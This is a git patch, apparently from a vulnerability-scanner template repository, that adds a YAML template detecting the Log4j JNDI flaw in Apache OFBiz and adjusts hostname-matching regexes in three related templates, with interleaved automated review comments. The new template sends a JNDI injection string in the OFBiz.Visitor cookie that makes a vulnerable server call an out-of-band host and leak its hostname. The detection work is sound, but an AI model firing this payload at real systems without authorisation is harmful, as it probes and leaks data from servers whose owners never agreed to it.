From 4af3a04b3ce85c9e2c471219b45b856115ec7871 Mon Sep 17 00:00:00 2001
From: Sandeep Singh
Date: Sat, 18 Dec 2021 15:46:49 +0530
Subject: [PATCH] Apache OFBiz Log4j JNDI RCE (#3374)
* Added Apache OFBiz Log4j JNDI RCE
* fixed matcher to match hostname in both cases
---
 .../apache/apache-ofbiz-log4j-rce.yaml | 33 +++++++++++++++++++
 .../apache/apache-solr-log4j-rce.yaml | 4 +--
 .../mobileiron/mobileiron-log4j-jndi-rce.yaml | 4 +--
 .../vmware/vmware-vcenter-log4j-jndi-rce.yaml | 4 +--
 4 files changed, 39 insertions(+), 6 deletions(-)
 create mode 100644 vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
diff --git a/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
new file mode 100644
index 0000000000..c5937771c0
--- /dev/null
+++ b/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
@@ -0,0 +1,33 @@
+id: apache-ofbiz-log4j-rce
+
+info:
+ name: Apache OFBiz Log4j JNDI RCE
+ author: pdteam
+ severity: critical
+ tags: ofbiz,oast,log4j,rce,apache
+
+requests:
+ - raw:
+ - |
+ GET /webtools/control/main HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+
+ extractors:
+ - type: regex
+ part: interactsh_request
+ group: 1
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
\ No newline at end of file
diff --git a/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/vulnerabilities/apache/apache-solr-log4j-rce.yaml
index 5f9cb2dd84..19d21efac7 100644
--- a/vulnerabilities/apache/apache-solr-log4j-rce.yaml
+++ b/vulnerabilities/apache/apache-solr-log4j-rce.yaml
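Review bot: The `info` block of the new template has no `description` and no `reference`, so a finding reports a name and a critical severity but not which Log4j behaviour is being confirmed or where the vendor guidance lives; add a one-line `description:` such as `description: Detects Apache OFBiz instances whose Log4j resolves JNDI lookups placed in the OFBiz.Visitor cookie, confirmed by an out-of-band DNS interaction.` and a `reference:` list pointing at the advisory. The regex matcher reuses the extractor pattern, and because group 1 admits dots (`[a-zA-Z0-9\.\-]+`) and the pattern is unanchored, the capture is greedy: with an interactsh domain of more than two labels the extracted "hostname" would presumably include part of the callback domain, which is worth confirming against the interactsh server the template is run with. The inline comment `# Match for extracted ${hostName} variable` on the matcher is misleading, since only the extractor extracts; `# Require the DNS callback name to carry a ${hostName} prefix` describes what the matcher actually enforces.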
@@ -26,11 +26,11 @@ requests: - type: regex part: interactsh_request regex: - - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file diff --git a/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml index 70849704af..b66890728d 100644 --- a/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml +++ b/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml @@ -31,11 +31,11 @@ requests: - type: regex part: interactsh_request regex: - - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file diff --git a/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml index 83d9508245..b231e287be 100644 --- a/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml 
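Review bot: The widening to `[a-zA-Z0-9\.\-]` touches only the first capture group, while the two labels after it stay `[a-z0-9]`; if the intent is case-insensitive hostname matching, as the commit message says, a flag on the whole pattern states that once and avoids the asymmetric character classes: `- '(?i)([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'`. The same edit is repeated in the mobileiron hunk on this line and the vmware hunk on the next, and the new OFBiz template carries the widened form too, so whichever form is chosen should be applied to all four files together. The enclosing `requests:` entry begins above the hunk.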
@@ -28,11 +28,11 @@ requests: - type: regex part: interactsh_request regex: - - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file